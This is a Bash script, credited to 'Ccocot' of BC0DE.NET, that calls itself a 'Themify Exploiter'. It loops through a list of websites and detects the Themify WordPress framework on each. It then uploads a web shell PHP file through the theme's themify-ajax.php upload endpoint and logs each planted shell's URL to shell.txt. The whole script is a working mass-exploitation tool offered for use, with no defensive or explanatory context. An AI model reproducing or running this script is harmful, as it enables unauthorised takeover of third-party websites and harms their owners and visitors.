Themify.sh

#!/bin/bash
# BC0DE.NET - CCOCOT.CO

header(){
cat << "EOF"
         ____   ____ ___  ____  _____   _   _ _____ _____
        | __ ) / ___/ _ \|  _ \| ____| | \ | | ____|_   _|
        |  _ \| |  | | | | | | |  _|   |  \| |  _|   | |
        | |_) | |__| |_| | |_| | |___ _| |\  | |___  | |
        |____/ \____\___/|____/|_____(_)_| \_|_____| |_|

            Themify Exploiter
            Ccocot | ccocot@bc0de.net
            Thank For Monyet B Luffy

EOF
}


function Exploit(){
    local CY='\e[36m'
    local GR='\e[34m'
    local OG='\e[92m'
    local WH='\e[37m'
    local RD='\e[31m'
    local YL='\e[33m'
    local BF='\e[34m'
    local DF='\e[39m'
    local OR='\e[33m'
    local PP='\e[35m'
    local B='\e[1m'
    local CC='\e[0m'
    printf "${CY}[*]${CC} Website: ${1}\n"
    local CHECK=$(curl -s ${1} -L)
    if [[ $CHECK =~ "/themify/" ]]; then
        local THEME=$(echo $CHECK | grep -Po "(?<=/themes/)[^/]*" | head -1)
        printf "${OG}[+]${CC} Themify Found [${B}${PP}$THEME${CC}]\n"
        local EXPLOIT=$(curl -s "${1}/wp-content/themes/${THEME}/themify/themify-ajax.php?upload=1" -X POST -F "Filedata=@${2}" -D -)
        if [[ $EXPLOIT =~ "${2}" ]]; then
            printf "${OG}[+]${CC} EXPLOIT SUKSES ... [${2}]\n"
            printf "${OG}[+]${CC} ${1}/wp-content/themes/${THEME}/uploads/${2}\n\n"
            echo "${1}/wp-content/themes/${THEME}/uploads/${2}" >> shell.txt
        else
            printf "${RD}[-]${CC} EXPLOIT GAGAL ... [$2]\n\n"
        fi
    else
        printf "${RD}[-]${CC} Themify not found\n\n"
    fi
}

if [ -z $1 ]; then
    header
    printf "\n To Use $0 <file.txt> <shell.php>\n"
    exit 1
fi

header
SHELL=$2

for SITE in $(cat $1); do
    Exploit "${SITE}" "${SHELL}"
done